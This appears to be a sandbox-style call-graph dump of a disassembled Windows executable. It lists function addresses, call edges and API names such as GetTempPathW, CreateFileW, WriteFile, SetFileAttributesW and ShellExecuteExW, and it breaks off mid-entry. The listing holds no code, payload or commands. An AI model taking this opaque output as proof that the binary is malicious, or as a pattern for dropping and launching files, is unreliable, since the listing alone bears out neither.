4073d1 21 API calls 9181 40599c ctype 9178->9181 9179 401329 2 API calls 9179->9182 9180 405a4d 9184 405a2b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9180->9184 9222 405a61 9180->9222 9669 4082e9 9180->9669 9185 4059a7 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9181->9185 9182->9154 9182->9155 9182->9161 9182->9164 9182->9172 9182->9179 9187 402f6c 7 API calls 9182->9187 9491 40243b 9182->9491 9648 402425 ??3@YAXPAX ??3@YAXPAX 9182->9648 9184->9180 9185->9083 9187->9182 9189 405910 ??3@YAXPAX 9189->9182 9190 401411 2 API calls 9190->9222 9192->9176 9193 405bd8 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9213 405bf3 9193->9213 9194 405a9f GetKeyState 9194->9222 9195 405c6c 9197 405ca2 9195->9197 9198 405c74 9195->9198 9196 40243b lstrcmpW 9196->9222 9201 4012f7 2 API calls 9197->9201 9711 403f85 9198->9711 9202 405cb0 9201->9202 9205 403b59 15 API calls 9202->9205 9209 405cb9 9205->9209 9206 407776 55 API calls 9210 405c13 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9206->9210 9207 401362 2 API calls 9211 405c91 ??3@YAXPAX 9207->9211 9208->9083 9212 405cca ??3@YAXPAX 9209->9212 9216 401362 2 API calls 9209->9216 9210->9213 9217 405cd9 9211->9217 9212->9217 9213->9206 9214 405c4a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9213->9214 9214->9213 9215 405bcd ??3@YAXPAX 9215->9222 9216->9212 9219 405d24 9217->9219 9220 405d16 9217->9220 9218 401329 ??2@YAPAXI ??3@YAXPAX 9218->9222 9724 40786b 9219->9724 9507 404a44 9220->9507 9222->9190 9222->9193 9222->9194 9222->9195 9222->9196 9222->9213 9222->9214 9222->9215 9222->9218 9224 401429 ??2@YAPAXI ??3@YAXPAX 9222->9224 9696 407613 9222->9696 9705 407674 9222->9705 9224->9222 9225 405d20 9226 405d65 9225->9226 9730 403e0d 9225->9730 9227 404034 21 API calls 9226->9227 9229 405d77 9227->9229 9231 401411 2 API calls 9229->9231 9232 406373 9229->9232 9233 405d95 9231->9233 9234 4063f7 ctype 9232->9234 9237 40243b lstrcmpW 9232->9237 9277 405da8 9233->9277 9734 40453e 9233->9734 9236 40643a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9234->9236 9242 40243b lstrcmpW 9234->9242 9239 406461 9236->9239 9240 406467 ??3@YAXPAX 9236->9240 9238 4063a4 9237->9238 9238->9234 9761 403f48 9238->9761 9239->9240 9241 403e70 ctype 4 API calls 9240->9241 9243 406478 ??3@YAXPAX ??3@YAXPAX 9241->9243 9245 406416 9242->9245 9243->9045 9244 401411 ??2@YAPAXI ??3@YAXPAX 9244->9277 9245->9236 9249 406423 9245->9249 9248 405dd8 9252 405de5 9248->9252 9253 4061fa ??3@YAXPAX ??3@YAXPAX 9248->9253 9250 4012f7 2 API calls 9249->9250 9255 406432 9250->9255 9251 4073d1 21 API calls 9256 4063e0 ??3@YAXPAX 9251->9256 9743 4043c6 9252->9743 9257 406312 9253->9257 9254 40243b lstrcmpW 9254->9277 9766 404aff 9255->9766 9256->9234 9260 40636a ??3@YAXPAX 9257->9260 9263 404034 21 API calls 9257->9263 9259 405e45 9265 401329 2 API calls 9259->9265 9260->9232 9268 406321 9263->9268 9269 405e4e 9265->9269 9266 4043c6 2 API calls 9267 405e0e 9266->9267 9270 401362 2 API calls 9267->9270 9751 4048ab 9268->9751 9274 403b7f 19 API calls 9269->9274 9275 405e1a ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9270->9275 9272 40626b ??3@YAXPAX ??3@YAXPAX 9272->9257 9273 401329 2 API calls 9273->9277 9290 405e57 9274->9290 9278 406211 9275->9278 9279 405e41 9275->9279 9276 40633a SetCurrentDirectoryW 9280 4048ab 4 API calls 9276->9280 9277->9244 9277->9248 9277->9254 9277->9259 9277->9272 9277->9273 9281 401429 2 API calls 9277->9281 9284 403e0d 16 API calls 9278->9284 9279->9259 9282 406362 9280->9282 9283 405ee5 ??3@YAXPAX ??3@YAXPAX 9281->9283 9285 403e0d 16 API calls 9282->9285 9283->9277 9286 406216 9284->9286 9285->9260 9287 407776 55 API calls 9286->9287 9288 40621f 7 API calls 9287->9288 9289 40625e 9288->9289 9289->9272 9291 405f61 _wtol 9290->9291 9292 403bce lstrlenW lstrlenW _wcsnicmp 9290->9292 9293 406025 9290->9293 9291->9290 9292->9290 9294 406080 9293->9294 9295 40602e 9293->9295 9296 401362 2 API calls 9294->9296 9297 406053 9295->9297 9298 406034 9295->9298 9299 40607e 9296->9299 9301 401329 2 API calls 9297->9301 9300 401329 2 API calls 9298->9300 9302 40254d 2 API calls 9299->9302 9303 40603f 9300->9303 9304 406051 9301->9304 9305 406092 9302->9305 9306 40254d 2 API calls 9303->9306 9307 40243b lstrcmpW 9304->9307 9308 401411 2 API calls 9305->9308 9309 406048 9306->9309 9310 406068 9307->9310 9311 40609a 9308->9311 9312 40254d 2 API calls 9309->9312 9310->9305 9314 40254d 2 API calls 9310->9314 9313 401411 2 API calls 9311->9313 9312->9304 9315 4060a2 memset 9313->9315 9314->9299 9316 4060e1 9315->9316 9317 404594 2 API calls 9316->9317 9318 4060fe 9317->9318 9319 401329 2 API calls 9318->9319 9320 406109 9319->9320 9321 403b7f 19 API calls 9320->9321 9322 406112 9321->9322 9323 4061b1 9322->9323 9527 4021ed 9322->9527 9325 4062ee ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9323->9325 9327 4061c5 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9323->9327 9325->9257 9327->9253 9328 406150 9330 403b7f 19 API calls 9328->9330 9329 401429 2 API calls 9331 406147 9329->9331 9332 406168 ShellExecuteExW 9330->9332 9334 40254d 2 API calls 9331->9334 9335 406282 9332->9335 9336 40618c 9332->9336 9334->9328 9339 407776 55 API calls 9335->9339 9337 4061a0 CloseHandle 9336->9337 9338 406192 WaitForSingleObject 9336->9338 9748 402185 9337->9748 9338->9337 9341 40628c 9339->9341 9342 403e0d 16 API calls 9341->9342 9343 406291 9 API calls 9342->9343 9344 4062e1 9343->9344 9344->9325 9346 401b6c SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 9345->9346 9347 401b9f GetVersionExW 9345->9347 9346->9347 9347->9043 9347->9044 9349 40112b 2 API calls 9348->9349 9350 403e38 GetCommandLineW 9349->9350 9351 404594 9350->9351 9352 4045ce 9351->9352 9355 4045a2 9351->9355 9354 401429 2 API calls 9352->9354 9356 4045c6 9352->9356 9353 401429 2 API calls 9353->9355 9354->9352 9355->9353 9355->9356 9356->9055 9358 401411 2 API calls 9357->9358 9364 402a79 9358->9364 9359 401362 2 API calls 9360 402b6c ??3@YAXPAX 9359->9360 9360->9058 9361 402b5f 9361->9359 9363 401411 2 API calls 9363->9364 9364->9361 9364->9363 9365 401429 ??2@YAPAXI ??3@YAXPAX 9364->9365 9367 401362 2 API calls 9364->9367 9805 4025c6 9364->9805 9808 40272e 9364->9808 9365->9364 9368 402ad9 ??3@YAXPAX 9367->9368 9369 4013e2 2 API calls 9368->9369 9370 402aee ??3@YAXPAX ??3@YAXPAX 9369->9370 9370->9364 9372 403d80 9371->9372 9373 403dbd 9372->9373 9374 403d9a lstrlenW lstrlenW 9372->9374 9373->9061 9373->9063 9819 401a85 9374->9819 9377 401f47 3 API calls 9376->9377 9378 404416 9377->9378 9379 401f9d 19 API calls 9378->9379 9380 40441d 9379->9380 9381 401f9d 19 API calls 9380->9381 9382 404429 9381->9382 9383 401f9d 19 API calls 9382->9383 9384 404435 9383->9384 9385 401f9d 19 API calls 9384->9385 9386 404441 9385->9386 9387 401f9d 19 API calls 9386->9387 9388 40444d 9387->9388 9389 401f9d 19 API calls 9388->9389 9390 404459 9389->9390 9391 401f9d 19 API calls 9390->9391 9392 404465 9391->9392 9393 404480 SHGetSpecialFolderPathW 9392->9393 9396 404533 #17 9392->9396 9397 401411 2 API calls 9392->9397 9398 401329 ??2@YAPAXI ??3@YAXPAX 9392->9398 9400 402f6c 7 API calls 9392->9400 9824 402425 ??3@YAXPAX ??3@YAXPAX 9392->9824 9393->9392 9394 40449a wsprintfW 9393->9394 9395 401411 2 API calls 9394->9395 9395->9392 9396->9064 9397->9392 9398->9392 9400->9392 9402 4022b0 2 API calls 9401->9402 9403 4025c2 9402->9403 9403->9107 9825 403e86 9404->9825 9406 404e56 9407 403e86 2 API calls 9406->9407 9408 404e65 9407->9408 9829 404343 9408->9829 9412 404e82 ??3@YAXPAX 9413 404343 3 API calls 9412->9413 9414 404e9d 9413->9414 9415 403ec1 2 API calls 9414->9415 9416 404ea8 ??3@YAXPAX wsprintfA 9415->9416 9845 403ef6 9416->9845 9418 404ed0 9419 403ef6 2 API calls 9418->9419 9420 404edb 9419->9420 9421 402844 9420->9421 9422 402851 9421->9422 9430 40dcfb 3 API calls 9422->9430 9423 402863 lstrlenA lstrlenA 9428 402890 9423->9428 9424 40296e 9424->9119 9424->9120 9425 40293b memmove 9425->9424 9425->9428 9426 4028db memcmp 9426->9424 9426->9428 9427 402918 memcmp 9427->9428 9428->9424 9428->9425 9428->9426 9428->9427 9431 40dcc7 GetLastError 9428->9431 9856 402640 9428->9856 9430->9423 9431->9428 9433 40243b lstrcmpW 9432->9433 9434 40461c 9433->9434 9435 40466c 9434->9435 9437 401329 2 API calls 9434->9437 9436 40243b lstrcmpW 9435->9436 9438 40468a 9436->9438 9439 404633 9437->9439 9442 40243b lstrcmpW 9438->9442 9440 401f9d 19 API calls 9439->9440 9441 40463a 9440->9441 9444 40254d 2 API calls 9441->9444 9443 4046a2 9442->9443 9446 40243b lstrcmpW 9443->9446 9445 404643 9444->9445 9447 401329 2 API calls 9445->9447 9448 4046ba 9446->9448 9449 40465c 9447->9449 9451 40243b lstrcmpW 9448->9451 9450 401f9d 19 API calls 9449->9450 9452 404663 9450->9452 9453 4046d2 9451->9453 9454 40254d 2 API calls 9452->9454 9455 4046e9 9453->9455 9456 4046d9 lstrcmpiW 9453->9456 9454->9435 9457 40243b lstrcmpW 9455->9457 9456->9455 9458 4046ff 9457->9458 9459 40243b lstrcmpW 9458->9459 9460 40472c 9459->9460 9461 404739 9460->9461 9859 403d1f 9460->9859 9463 40243b lstrcmpW 9461->9463 9467 40474d 9463->9467 9464 40476d 9465 40243b lstrcmpW 9464->9465 9472 404780 9465->9472 9467->9464 9468 40243b lstrcmpW 9467->9468 9863 403cc6 9467->9863 9468->9467 9469 4047a0 9471 40243b lstrcmpW 9469->9471 9473 4047ac 9471->9473 9472->9469 9474 40243b lstrcmpW 9472->9474 9867 403cf7 9472->9867 9475 40243b lstrcmpW 9473->9475 9474->9472 9476 4047bd 9475->9476 9477 40243b lstrcmpW 9476->9477 9478 4047ce 9477->9478 9479 4047e4 9478->9479 9480 4047db _wtol 9478->9480 9481 40243b lstrcmpW 9479->9481 9480->9479 9482 4047f0 9481->9482 9483 404800 9482->9483 9484 4047f7 _wtol 9482->9484 9485 40243b lstrcmpW 9483->9485 9484->9483 9486 40480c 9485->9486 9487 40243b lstrcmpW 9486->9487 9488 404824 9487->9488 9489 40243b lstrcmpW 9488->9489 9490 40483c 9489->9490 9490->9176 9875 4023dd 9491->9875 9495 404045 9494->9495 9496 404088 9494->9496 9497 4012f7 2 API calls 9495->9497 9498 403b7f 19 API calls 9495->9498 9496->9159 9496->9160 9497->9495 9499 404062 SetEnvironmentVariableW ??3@YAXPAX 9498->9499 9499->9495 9499->9496 9501 40393b 7 API calls 9500->9501 9502 403b69 9501->9502 9503 4039f6 7 API calls 9502->9503 9504 403b74 9503->9504 9505 4027c7 6 API calls 9504->9505 9506 403b7a 9505->9506 9506->9180 9652 4083b6 9506->9652 9879 408676 9507->9879 9509 404a55 ??2@YAPAXI 9510 404a64 9509->9510 9524 40dcfb 3 API calls 9510->9524 9511 404a85 9881 40b2fc 9511->9881 9887 40a7de _EH_prolog 9511->9887 9512 404a95 9513 404ab3 9512->9513 9514 404a99 9512->9514 9516 404ada ??2@YAPAXI 9513->9516 9519 403354 86 API calls 9513->9519 9515 407776 55 API calls 9514->9515 9523 404aa1 9515->9523 9517 404ae6 9516->9517 9518 404aed 9516->9518 9922 404292 9517->9922 9903 40150b 9518->9903 9521 404ac6 9519->9521 9521->9516 9521->9523 9523->9225 9524->9511 9528 402200 LoadLibraryA GetProcAddress 9527->9528 9529 4021fb 9527->9529 9530 40221b 9528->9530 9531 402223 9528->9531 9529->9323 9529->9328 9529->9329 9530->9529 9531->9530 10385 4021b9 LoadLibraryA GetProcAddress 9531->10385 9534 40661a 2 API calls 9533->9534 9535 4049af 9534->9535 9536 401f9d 19 API calls 9535->9536 9537 4049bd 9536->9537 9538 4024fc 2 API calls 9537->9538 9539 4049c7 9538->9539 9540 4049fd 9539->9540 9542 40254d ??2@YAPAXI ??3@YAXPAX 9539->9542 9541 40254d 2 API calls 9540->9541 9543 404a0a 9541->9543 9542->9539 9544 401f9d 19 API calls 9543->9544 9545 404a11 9544->9545 9546 40254d 2 API calls 9545->9546 9547 404a1b 9546->9547 9548 4073d1 21 API calls 9547->9548 9549 404a30 ??3@YAXPAX 9548->9549 9550 404a41 ctype 9549->9550 9550->9083 9552 40e8da ctype 3 API calls 9551->9552 9553 403e7e 9552->9553 9554 40e8da ctype 3 API calls 9553->9554 9555 40e943 ??3@YAXPAX 9554->9555 9555->9077 9557 40db53 2 API calls 9556->9557 9558 404ce8 9557->9558 9559 404d44 9558->9559 9561 4024fc 2 API calls 9558->9561 9560 4025ae 2 API calls 9559->9560 9562 404d4c 9560->9562 9563 404cf7 9561->9563 9564 403e86 2 API calls 9562->9564 9567 404db5 ??3@YAXPAX 9563->9567 9569 403354 86 API calls 9563->9569 9565 404d59 9564->9565 9566 403ef6 2 API calls 9565->9566 9568 404d66 9566->9568 9581 404db1 9567->9581 9570 403ef6 2 API calls 9568->9570 9571 404d1b 9569->9571 9572 404d73 9570->9572 9571->9567 9574 40db53 2 API calls 9571->9574 9573 403ef6 2 API calls 9572->9573 9575 404d80 9573->9575 9576 404d37 9574->9576 9577 40dd5f 2 API calls 9575->9577 9576->9567 9578 404d3b ??3@YAXPAX 9576->9578 9579 404d94 9577->9579 9578->9559 9579->9567 9580 404d9d ??3@YAXPAX 9579->9580 9580->9581 9581->9142 9583 4025ae 2 API calls 9582->9583 9599 4030a8 9583->9599 9584 403301 9585 403344 ??3@YAXPAX 9584->9585 9586 40334e 9585->9586 9586->9128 9586->9135 9587 401411 ??2@YAPAXI ??3@YAXPAX 9587->9599 9589 40272e ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 9589->9599 9590 401362 2 API calls 9591 4030f3 ??3@YAXPAX ??3@YAXPAX 9590->9591 9592 403303 9591->9592 9591->9599 10393 4029c3 9592->10393 9596 40331c ??3@YAXPAX 9596->9586 9597 4031e5 strncmp 9598 4031d0 strncmp 9597->9598 9597->9599 9598->9597 9598->9599 9599->9584 9599->9587 9599->9589 9599->9590 9599->9592 9599->9597 9600 401362 2 API calls 9599->9600 9601 402640 2 API calls 9599->9601 9604 402640 ??2@YAPAXI ??3@YAXPAX 9599->9604 9606 4023dd lstrcmpW 9599->9606 9607 402f6c 7 API calls 9599->9607 9609 403330 9599->9609 9610 4032b2 lstrcmpW 9599->9610 9614 401329 2 API calls 9599->9614 10387 402986 9599->10387 10392 402425 ??3@YAXPAX ??3@YAXPAX 9599->10392 9602 403252 ??3@YAXPAX 9600->9602 9601->9598 9603 402a69 9 API calls 9602->9603 9605 403263 lstrcmpW 9603->9605 9604->9599 9605->9599 9606->9599 9607->9599 9612 402f6c 7 API calls 9609->9612 9610->9599 9611 4032c0 lstrcmpW 9610->9611 9611->9599 9613 40333c 9612->9613 10411 402425 ??3@YAXPAX ??3@YAXPAX 9613->10411 9614->9599 9617 402f86 9616->9617 9618 402f7b 9616->9618 9620 408761 4 API calls 9617->9620 10413 402668 9618->10413 9621 402f92 9620->9621 9621->9132 9622->9132 9624 4024fc 2 API calls 9623->9624 9625 40485f 9624->9625 9626 40254d 2 API calls 9625->9626 9627 40486c 9626->9627 9628 404888 9627->9628 9629 401429 2 API calls 9627->9629 9630 40254d 2 API calls 9628->9630 9629->9627 9631 404892 9630->9631 9632 40408b 94 API calls 9631->9632 9633 40489d ??3@YAXPAX 9632->9633 9633->9176 9635 4040a2 lstrlenW 9634->9635 9636 4040ce 9634->9636 9637 401a85 4 API calls 9635->9637 9636->9176 9638 4040b8 9637->9638 9638->9635 9638->9636 9639 4040d5 9638->9639 9640 4024fc 2 API calls 9639->9640 9643 4040de 9640->9643 10418 402776 9643->10418 9644 403093 84 API calls 9645 40414c 9644->9645 9646 404156 ??3@YAXPAX ??3@YAXPAX 9645->9646 9647 40416d ??3@YAXPAX ??3@YAXPAX 9645->9647 9646->9636 9647->9636 9648->9189 9650 40661a 2 API calls 9649->9650 9651 403b48 9650->9651 9651->9178 9653 408646 9652->9653 9665 4083d5 ctype 9652->9665 9653->9184 9654 40661a 2 API calls 9654->9665 9655 40786b 23 API calls 9655->9665 9656 40243b lstrcmpW 9656->9665 9658 407674 23 API calls 9658->9665 9659 407613 23 API calls 9659->9665 9660 403b40 2 API calls 9660->9665 9661 401f9d 19 API calls 9661->9665 9662 407776 55 API calls 9662->9665 9663 403f48 4 API calls 9663->9665 9664 4073d1 21 API calls 9664->9665 9665->9653 9665->9654 9665->9655 9665->9656 9665->9658 9665->9659 9665->9660 9665->9661 9665->9662 9665->9663 9665->9664 9666 407717 25 API calls 9665->9666 9667 4073d1 21 API calls 9665->9667 10428 40744b 9665->10428 9666->9665 9668 408476 ??3@YAXPAX 9667->9668 9668->9665 9670 40243b lstrcmpW 9669->9670 9671 4082fd 9670->9671 9672 40830b 9671->9672 10432 4019f0 GetStdHandle WriteFile 9671->10432 9674 40831e 9672->9674 10433 4019f0 GetStdHandle WriteFile 9672->10433 9676 408333 9674->9676 10434 4019f0 GetStdHandle WriteFile 9674->10434 9678 408344 9676->9678 10435 4019f0 GetStdHandle WriteFile 9676->10435 9680 40243b lstrcmpW 9678->9680 9681 408351 9680->9681 9684 40835f 9681->9684 10436 4019f0 GetStdHandle WriteFile 9681->10436 9683 40243b lstrcmpW 9685 40836c 9683->9685 9684->9683 9686 40837a 9685->9686 10437 4019f0 GetStdHandle WriteFile 9685->10437 9688 40243b lstrcmpW 9686->9688 9689 408387 9688->9689 9690 408395 9689->9690 10438 4019f0 GetStdHandle WriteFile 9689->10438 9692 40243b lstrcmpW 9690->9692 9693 4083a2 9692->9693 9694 4083b2 9693->9694 10439 4019f0 GetStdHandle WriteFile 9693->10439 9694->9180 9697 407636 9696->9697 9698 407658 9697->9698 9699 40764b 9697->9699 10443 407186 9698->10443 10440 407154 9699->10440 9702 407653 9703 4073d1 21 API calls 9702->9703 9704 407671 9703->9704 9704->9222 9706 407689 9705->9706 9707 40716d 2 API calls 9706->9707 9708 407694 9707->9708 9709 4073d1 21 API calls 9708->9709 9710 4076a5 9709->9710 9710->9222 9712 401411 2 API calls 9711->9712 9713 403f96 9712->9713 9714 402535 2 API calls 9713->9714 9715 403f9f GetTempPathW 9714->9715 9716 403fb8 9715->9716 9721 403fcf 9715->9721 9717 402535 2 API calls 9716->9717 9718 403fc3 GetTempPathW 9717->9718 9718->9721 9719 402535 2 API calls 9720 403ff2 wsprintfW 9719->9720 9720->9721 9721->9719 9722 404009 GetFileAttributesW 9721->9722 9723 40402d 9721->9723 9722->9721 9722->9723 9723->9207 9725 40787e 9724->9725 10449 40719f 9725->10449 9728 4073d1 21 API calls 9729 4078b3 9728->9729 9729->9225 9731 403e21 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9730->9731 9732 403e16 9730->9732 9731->9226 9733 402c86 16 API calls 9732->9733 9733->9731 9735 40243b lstrcmpW 9734->9735 9736 40455d 9735->9736 9737 404592 9736->9737 9738 401329 2 API calls 9736->9738 9737->9277 9739 40456c 9738->9739 9740 403b7f 19 API calls 9739->9740 9741 404572 9740->9741 9741->9737 9742 401429 2 API calls 9741->9742 9742->9737 9744 4012f7 2 API calls 9743->9744 9745 4043d4 9744->9745 9746 40254d 2 API calls 9745->9746 9747 4043df 9746->9747 9747->9266 9749 4021a9 9748->9749 9750 40218e LoadLibraryA GetProcAddress 9748->9750 9749->9323 9750->9749 9752 401411 2 API calls 9751->9752 9759 4048bc 9752->9759 9753 401329 2 API calls 9753->9759 9754 40494e 9755 404988 ??3@YAXPAX 9754->9755 9757 4048ab 3 API calls 9754->9757 9755->9276 9756 401429 2 API calls 9756->9759 9758 404985 9757->9758 9758->9755 9759->9753 9759->9754 9759->9756 9760 40243b lstrcmpW 9759->9760 9760->9759 9762 40661a 2 API calls 9761->9762 9763 403f50 9762->9763 9764 401411 2 API calls 9763->9764 9765 403f5e 9764->9765 9765->9251 9767 404cb1 ??3@YAXPAX 9766->9767 9769 404b15 9766->9769 9770 404cb7 9767->9770 9768 404b29 GetDriveTypeW 9768->9767 9771 404b55 9768->9771 9769->9767 9769->9768 9770->9236 9772 403f85 6 API calls 9771->9772 9773 404b63 CreateFileW 9772->9773 9774 404b89 9773->9774 9775 404c7b ??3@YAXPAX ??3@YAXPAX 9773->9775 9776 401411 2 API calls 9774->9776 9775->9770 9777 404b92 9776->9777 9778 401329 2 API calls 9777->9778 9779 404b9f 9778->9779 9780 40254d 2 API calls 9779->9780 9781 404bad 9780->9781 9782 4013e2 2 API calls 9781->9782 9783 404bb9 9782->9783 9784 40254d 2 API calls 9783->9784 9785 404bc7 9784->9785 9786 40254d 2 API calls 9785->9786 9787 404bd4 9786->9787 9788 4013e2 2 API calls 9787->9788 9789 404be0 9788->9789 9790 40254d 2 API calls 9789->9790 9791 404bed 9790->9791 9792 40254d 2 API calls 9791->9792 9793 404bf6 9792->9793 9794 4013e2 2 API calls 9793->9794 9795 404c02 9794->9795 9796 40254d 2 API calls 9795->9796 9797 404c0b 9796->9797 9798 402776 3 API calls 9797->9798 9799 404c1d WriteFile ??3@YAXPAX CloseHandle 9798->9799 9800 404c4b 9799->9800 9801 404c8c 9799->9801 9800->9801 9802 404c53 SetFileAttributesW ShellExecuteW ??3@YAXPAX 9800->9802 9803 402c86 16 API calls 9801->9803 9802->9775 9804 404c94 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9803->9804 9804->9770 9814 4022b0 9805->9814 9809 401411 2 API calls 9808->9809 9810 40273a 9809->9810 9811 402772 9810->9811 9812 402535 2 API calls 9810->9812 9811->9364 9813 402757 MultiByteToWideChar 9812->9813 9813->9811 9815 4022ea 9814->9815 9816 4022be ??2@YAPAXI 9814->9816 9815->9364 9816->9815 9818 4022cf 9816->9818 9817 4022e2 ??3@YAXPAX 9817->9815 9818->9817 9818->9818 9820 401ae3 9819->9820 9821 401a97 9819->9821 9820->9373 9821->9820 9822 401abc CharUpperW CharUpperW 9821->9822 9822->9821 9823 401af3 CharUpperW CharUpperW 9822->9823 9823->9820 9824->9392 9826 403e9e 9825->9826 9827 4022b0 2 API calls 9826->9827 9828 403eac 9827->9828 9828->9406 9830 40435e 9829->9830 9831 404375 9830->9831 9832 40436a 9830->9832 9833 4025ae 2 API calls 9831->9833 9849 4025f6 9832->9849 9834 40437e 9833->9834 9836 4022b0 2 API calls 9834->9836 9838 404387 9836->9838 9837 404373 9841 403ec1 9837->9841 9838->9838 9839 4025f6 2 API calls 9838->9839 9840 4043b5 ??3@YAXPAX 9839->9840 9840->9837 9842 403ecd 9841->9842 9844 403ede 9841->9844 9843 4022b0 2 API calls 9842->9843 9843->9844 9844->9412 9846 403f06 9845->9846 9846->9846 9852 4022fc 9846->9852 9848 403f13 9848->9418 9850 4022b0 2 API calls 9849->9850 9851 402610 9850->9851 9851->9837 9853 402340 9852->9853 9854 402310 9852->9854 9853->9848 9855 4022b0 2 API calls 9854->9855 9855->9853 9857 4022fc 2 API calls 9856->9857 9858 40264a 9857->9858 9858->9428 9860 403d3d 9859->9860 9871 403c63 9860->9871 9864 403cd3 9863->9864 9865 403c63 _wtol 9864->9865 9866 403cf4 9865->9866 9866->9467 9868 403d04 9867->9868 9869 403c63 _wtol 9868->9869 9870 403d1c 9869->9870 9870->9472 9872 403c6d 9871->9872 9873 403c88 _wtol 9872->9873 9874 403cc1 9872->9874 9873->9872 9874->9461 9876 4023e8 9875->9876 9877 402411 9876->9877 9878 4023f4 lstrcmpW 9876->9878 9877->9182 9878->9876 9878->9877 9880 408679 9879->9880 9880->9509 9882 40b30d 9881->9882 9886 40dcfb 3 API calls 9882->9886 9883 40b321 9884 40b331 9883->9884 9927 40b163 9883->9927 9884->9512 9886->9883 9888 40a7fe 9887->9888 9889 40b2fc 11 API calls 9888->9889 9890 40a823 9889->9890 9891 40a845 9890->9891 9892 40a82c 9890->9892 9955 40cc59 _EH_prolog 9891->9955 9958 40a3fe 9892->9958 9904 40151e 9903->9904 9905 401329 2 API calls 9904->9905 9906 40152b 9905->9906 9907 401429 2 API calls 9906->9907 9908 401534 CreateThread 9907->9908 9909 401563 9908->9909 9910 401568 WaitForSingleObject 9908->9910 10379 40129c 9908->10379 9911 40786b 23 API calls 9909->9911 9912 401585 9910->9912 9913 4015b7 9910->9913 9911->9910 9916 4015a3 9912->9916 9919 401594 9912->9919 9914 4015b3 9913->9914 9915 4015bf GetExitCodeThread 9913->9915 9914->9523 9917 4015d6 9915->9917 9918 407776 55 API calls 9916->9918 9917->9914 9917->9919 9920 401605 SetLastError 9917->9920 9918->9914 9919->9914 9921 407776 55 API calls 9919->9921 9920->9919 9921->9914 9923 401411 2 API calls 9922->9923 9924 4042ab 9923->9924 9925 401411 2 API calls 9924->9925 9926 4042b7 9925->9926 9926->9518 9940 40f0b6 9927->9940 9929 40b192 9929->9884 9930 40b17e 9930->9929 9943 40adc3 9930->9943 9933 40b297 ??3@YAXPAX 9933->9929 9934 40b2a2 ??3@YAXPAX 9934->9929 9936 40b27a memmove 9937 40b1d9 9936->9937 9937->9933 9937->9934 9937->9936 9938 40b2ac memcpy 9937->9938 9939 40dcfb 3 API calls 9938->9939 9939->9934 9951 40f06b 9940->9951 9944 40add0 9943->9944 9945 40ae0d memcpy 9943->9945 9946 40add5 ??2@YAPAXI 9944->9946 9947 40adfb 9944->9947 9945->9937 9948 40adfd ??3@YAXPAX 9946->9948 9949 40ade5 memmove 9946->9949 9947->9948 9948->9945 9949->9948 9952 40f0af 9951->9952 9953 40f07d 9951->9953 9952->9930 9953->9952 9954 40dcc7 GetLastError 9953->9954 9954->9953 9966 40c9fc 9955->9966 10362 40a28e 9958->10362 9988 40a0bf 9966->9988 10111 40a030 9988->10111 10112 40e8da ctype 3 API calls 10111->10112 10113 40a039 10112->10113 10114 40e8da ctype 3 API calls 10113->10114 10115 40a041 10114->10115 10116 40e8da ctype 3 API calls 10115->10116 10117 40a049 10116->10117 10118 40e8da ctype 3 API calls 10117->10118 10119 40a051 10118->10119 10120 40e8da ctype 3 API calls 10119->10120 10121 40a059 10120->10121 10122 40e8da ctype 3 API calls 10121->10122 10123 40a061 10122->10123 10124 40e8da ctype 3 API calls 10123->10124 10125 40a06b 10124->10125 10126 40e8da ctype 3 API calls 10125->10126 10127 40a073 10126->10127 10128 40e8da ctype 3 API calls 10127->10128 10129 40a080 10128->10129 10130 40e8da ctype 3 API calls 10129->10130 10131 40a088 10130->10131 10132 40e8da ctype 3 API calls 10131->10132 10133 40a095 10132->10133 10134 40e8da ctype 3 API calls 10133->10134 10135 40a09d 10134->10135 10136 40e8da ctype 3 API calls 10135->10136 10137 40a0aa 10136->10137 10138 40e8da ctype 3 API calls 10137->10138 10139 40a0b2 10138->10139 10363 40e8da ctype 3 API calls 10362->10363 10364 40a29c 10363->10364 10380 4012a5 10379->10380 10381 4012b8 10379->10381 10380->10381 10382 4012a7 Sleep 10380->10382 10383 4012f1 10381->10383 10384 4012e3 EndDialog 10381->10384 10382->10380 10384->10383 10386 4021db 10385->10386 10386->9530 10388 4025ae 2 API calls 10387->10388 10389 402992 10388->10389 10390 4029be 10389->10390 10391 402640 2 API calls 10389->10391 10390->9599 10391->10389 10392->9599 10394 4029d2 10393->10394 10395 4029de 10393->10395 10412 4019f0 GetStdHandle WriteFile 10394->10412 10397 4025ae 2 API calls 10395->10397 10401 4029e8 10397->10401 10398 4029d9 10410 402425 ??3@YAXPAX ??3@YAXPAX 10398->10410 10399 402a13 10400 40272e 3 API calls 10399->10400 10402 402a25 10400->10402 10401->10399 10405 402640 2 API calls 10401->10405 10403 402a33 10402->10403 10404 402a47 10402->10404 10406 407776 55 API calls 10403->10406 10407 407776 55 API calls 10404->10407 10405->10401 10408 402a42 ??3@YAXPAX ??3@YAXPAX 10406->10408 10407->10408 10408->10398 10410->9596 10411->9585 10412->10398 10414 4012f7 2 API calls 10413->10414 10415 402676 10414->10415 10416 4012f7 2 API calls 10415->10416 10417 402682 10416->10417 10417->9617 10419 4025ae 2 API calls 10418->10419 10420 402785 10419->10420 10421 4027c1 10420->10421 10424 402628 10420->10424 10421->9644 10425 402634 10424->10425 10426 40263a WideCharToMultiByte 10424->10426 10427 4022b0 2 API calls 10425->10427 10426->10421 10427->10426 10429 407456 10428->10429 10430 40745b 10428->10430 10429->9665 10430->10429 10431 4073d1 21 API calls 10430->10431 10431->10429 10432->9672 10433->9674 10434->9676 10435->9678 10436->9684 10437->9686 10438->9690 10439->9694 10441 40661a 2 API calls 10440->10441 10442 40715c 10441->10442 10442->9702 10446 40716d 10443->10446 10447 40661a 2 API calls 10446->10447 10448 407175 10447->10448 10448->9702 10450 40661a 2 